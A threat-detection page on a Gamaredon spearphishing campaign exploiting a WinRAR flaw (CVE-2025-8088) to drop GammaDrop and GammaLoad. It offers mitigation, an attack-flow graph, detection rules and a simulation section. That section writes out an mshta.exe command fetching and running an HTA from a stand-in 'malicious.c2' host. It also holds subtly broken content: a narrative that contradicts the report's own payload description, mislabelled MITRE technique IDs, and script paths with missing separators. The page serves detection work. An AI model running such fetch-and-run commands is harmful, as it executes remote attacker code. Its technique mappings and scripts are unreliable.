Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The report outlines a Gamaredon campaign that abuses CVE-2025-8088 to deliver VBScript payloads through weaponized RAR archives attached to spearphishing emails aimed at Ukrainian state organizations. Once opened, the malicious archive drops a GammaDrop downloader, which retrieves a GammaLoad HTA beacon responsible for persistence and communication with Cloudflare-proxied command-and-control infrastructure. The activity has been ongoing since September 2025 and continues to evolve through changes in delivery techniques and infrastructure.
Investigation
Researchers analyzed email headers, archive contents, and the embedded VBScript and HTA payloads, uncovering exploitation of a WinRAR path traversal flaw, use of NTFS alternate data streams, and dynamic generation of command-and-control URLs. Their investigation also identified multiple Cloudflare Workers domains, fast-flux DNS patterns, and DDNS services tied to the attacker’s infrastructure.
Mitigation
Organizations should enforce strict DMARC policies, block the 194.58.66.0/24 subnet, and monitor for suspicious RAR5 archives that create alternate data streams in the Startup folder. Defenders should also detect the specific user-agent patterns used by the GammaLoad beacon. Restricting or disabling execution of mshta.exe and limiting access to Wscript.Shell can further reduce the risk of payload execution.
Response
If this activity is detected, isolate the affected endpoint, preserve the malicious RAR archive and VBScript files, remove infected files from the Startup folder, delete the related RunOnce registry entry, and block the identified command-and-control domains and IP addresses. Security teams should then perform forensic analysis to determine the scope of compromise and rotate credentials for any impacted email accounts.
"graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#ffcc99 classDef persistence fill:#ccffcc classDef process fill:#ff99cc %% Nodes – Actions (Techniques) action_email_spoofing["<b>Action</b> – <b>T1672 Email Spoofing</b><br/><b>Description</b>: Stolen government email credentials are used to authenticate to legitimate mail relays and send spoofed spearphishing messages appearing to originate from Ukrainian government entities."] class action_email_spoofing action action_spearphishing_attachment["<b>Action</b> – <b>T1566.001 Spearphishing Attachment</b><br/><b>Description</b>: The spoofed emails contain a RAR archive that exploits CVEu20112025u20118088 (WinRAR directoryu2011traversal) to deliver a malicious payload."] class action_spearphishing_attachment action action_taint_shared_content["<b>Action</b> – <b>T1080 Taint Shared Content</b><br/><b>Description</b>: The archive uses a crafted ADS entry with a pathu2011traversal sequence, causing WinRAR to write the VBScript payload into the Startup folder for persistence."] class action_taint_shared_content action action_masquerading_file_type["<b>Action</b> – <b>T1036.008 Masquerading File Type</b><br/><b>Description</b>: A decoy PDF file with random ASCII characters is presented to the user while the actual VBScript resides in an alternate data stream."] class action_masquerading_file_type action action_exploit_priv_esc["<b>Action</b> – <b>T1068 Exploitation for Privilege Escalation</b><br/><b>Description</b>: Exploiting CVEu20112025u20118088 grants code execution and allows writing to privileged locations without user interaction."] class action_exploit_priv_esc action action_obfuscation["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: GammaDrop and GammaLoad payloads are heavily obfuscated VBScript/HTA using random variable names, junk functions, and stringu2011building techniques."] class action_obfuscation action action_embedded_payloads["<b>Action</b> – <b>T1027.009 Embedded Payloads</b><br/><b>Description</b>: The secondu2011stage HTA wraps the VBScript beacon and includes a Base64u2011encoded blob."] class action_embedded_payloads action action_deobfuscate["<b>Action</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/><b>Description</b>: The HTA decodes the Base64 blob to write an installer script to the TEMP folder and registers a RunOnce key."] class action_deobfuscate action action_web_c2["<b>Action</b> – <b>T1071.001 Application Layer Protocol Web Protocols</b><br/><b>Description</b>: The beacon communicates over HTTPS to Cloudflare Workers domains and falls back to a .ru domain, embedding victim identifiers in the Useru2011Agent header."] class action_web_c2 action %% Nodes – Tools tool_winrar["<b>Tool</b> – <b>Name</b>: WinRAR<br/><b>Description</b>: Archive utility exploited via CVEu20112025u20118088 for directoryu2011traversal and ADS write."] class tool_winrar tool %% Nodes – Files file_malicious_rar["<b>File</b> – <b>Name</b>: Malicious RAR archive<br/><b>Content</b>: Contains crafted ADS entry and decoy PDF."] class file_malicious_rar file file_ascad_payload["<b>File</b> – <b>Name</b>: VBScript payload in ADS<br/><b>Location</b>: Written to %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"] class file_ascad_payload file file_decoy_pdf["<b>File</b> – <b>Name</b>: Decoy PDF<br/><b>Purpose</b>: Masquerades the malicious content to entice the user."] class file_decoy_pdf file file_hta_wrapper["<b>File</b> – <b>Name</b>: HTA wrapper<br/><b>Content</b>: Encodes VBScript beacon as Base64 blob."] class file_hta_wrapper file file_installer["<b>File</b> – <b>Name</b>: Installer script<br/><b>Location</b>: Written to %TEMP% by HTA."] class file_installer file %% Nodes – Persistence persistence_startup["<b>Persistence</b> – <b>Startup Folder</b><br/><b>Path</b>: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"] class persistence_startup persistence persistence_runonce["<b>Persistence</b> – <b>RunOnce Registry</b><br/><b>Location</b>: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"] class persistence_runonce persistence %% Nodes – C2 c2_cloudflare["<b>C2</b> – Cloudflare Workers domain<br/><b>Protocol</b>: HTTPS"] class c2_cloudflare process c2_fallback_ru["<b>C2</b> – Fallback .ru domain<br/><b>Protocol</b>: HTTPS"] class c2_fallback_ru process %% Connections action_email_spoofing –>|sends| file_malicious_rar file_malicious_rar –>|exploits| tool_winrar tool_winrar –>|triggers| action_spearphishing_attachment action_spearphishing_attachment –>|uses| action_taint_shared_content action_taint_shared_content –>|writes to| file_ascad_payload file_ascad_payload –>|establishes| persistence_startup action_taint_shared_content –>|creates| file_decoy_pdf action_masquerading_file_type –>|presents| file_decoy_pdf action_masquerading_file_type –>|hides| file_ascad_payload action_spearphishing_attachment –>|enables| action_exploit_priv_esc action_exploit_priv_esc –>|facilitates| action_obfuscation action_obfuscation –>|produces| file_hta_wrapper file_hta_wrapper –>|contains| action_embedded_payloads action_embedded_payloads –>|encodes| action_deobfuscate action_deobfuscate –>|writes to| file_installer file_installer –>|registers| persistence_runonce action_deobfuscate –>|initiates| action_web_c2 action_web_c2 –>|communicates with| c2_cloudflare action_web_c2 –>|fallback to| c2_fallback_ru "
Attack Flow
Detections
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
LOLBAS WScript / CScript (via process_creation)
View
Suspicious Binary / Scripts in Autostart Location (via file_event)
View
Possible CVE-2025-8088 / CVE-2025-6218 (WinRAR Vulnerability) Exploitation Attempt (via file_event)
View
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)
View
Possible Cloudflare Development Domain Abuse (via dns)
View
IOCs (HashSha256) to detect: Gamaredon’s Infection Chain: Spoofed Emails, GammaDrop and GammaLoad Part 5
View
IOCs (HashSha256) to detect: Gamaredon’s Infection Chain: Spoofed Emails, GammaDrop and GammaLoad Part 4
View
IOCs (HashSha256) to detect: Gamaredon’s Infection Chain: Spoofed Emails, GammaDrop and GammaLoad Part 3
View
IOCs (HashSha256) to detect: Gamaredon’s Infection Chain: Spoofed Emails, GammaDrop and GammaLoad Part 2
View
IOCs (HashSha256) to detect: Gamaredon’s Infection Chain: Spoofed Emails, GammaDrop and GammaLoad Part 1
View
IOCs (HashSha1) to detect: Gamaredon’s Infection Chain: Spoofed Emails, GammaDrop and GammaLoad
View
IOCs (SourceIP) to detect: Gamaredon’s Infection Chain: Spoofed Emails, GammaDrop and GammaLoad
View
IOCs (DestinationIP) to detect: Gamaredon’s Infection Chain: Spoofed Emails, GammaDrop and GammaLoad
View
Detection of GammaDrop and GammaLoad Execution [Windows Process Creation]
View
Detection of GammaDrop VBScript and GammaLoad HTA Execution [Windows File Event]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
The adversary, having compromised a victim machine, downloads a malicious HTA payload (GammaDrop) from a C2‑controlled server. The payload is intentionally obfuscated (T1027.009) and hosts a PowerShell dropper that later loads a second-stage DLL (GammaLoad) viawscript.exe. The attacker invokes the HTA with mshta.exe, causing Windows to interpret the HTA as a trusted HTML application—this exact process creation matches the detection rule. After the HTA runs, it drops a malicious JavaScript file and launches it throughwscript.exe, completing the DLL injection (T1574.007) and process‑doppelgänging (T1574.009).Commands executed on the compromised host (simulated):
- Download malicious HTA –
Invoke-WebRequest(simulated URL). - Execute via mshta.exe –
mshta.exe http://malicious.c2/gammadrop.hta. - Secondary execution with wscript.exe –
wscript.exe //E:jscript //B c:tempgammaload.js.
- Download malicious HTA –
-
Regression Test Script:
<# Simulated GammaDrop/GammaLoad execution to trigger the Sigma rule. This script: 1. Writes a mock malicious HTA file to %TEMP%. 2. Executes it with mshta.exe (produces the primary detection event). 3. Writes a mock malicious JScript file and runs it with wscript.exe (produces the secondary detection event). #> # 1. Create a dummy HTA payload (representing GammaDrop) $htaPath = "$env:TEMPgammadrop.hta" $htaContent = @" <script language="VBScript"> MsgBox "Simulated GammaDrop executed" </script> "@ Set-Content -Path $htaPath -Value $htaContent -Encoding ASCII # 2. Launch the HTA with mshta.exe (this should fire the detection) Write-Host "[*] Executing GammaDrop via mshta.exe" Start-Process -FilePath "mshta.exe" -ArgumentList "`"$htaPath`"" -Wait # 3. Create a dummy JScript payload (representing GammaLoad) $jsPath = "$env:TEMPgammaload.js" $jsContent = @" // Simulated malicious script WScript.Echo("GammaLoad simulated execution"); "@ Set-Content -Path $jsPath -Value $jsContent -Encoding ASCII # 4. Run the script with wscript.exe (second detection event) Write-Host "[*] Executing GammaLoad via wscript.exe" Start-Process -FilePath "wscript.exe" -ArgumentList "//E:jscript //B `"$jsPath`"" -Wait Write-Host "[+] Simulation complete." -
Cleanup Commands:
# Remove temporary files created during the simulation Remove-Item -Path "$env:TEMPgammadrop.hta" -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPgammaload.js" -ErrorAction SilentlyContinue Write-Host "[*] Cleanup finished."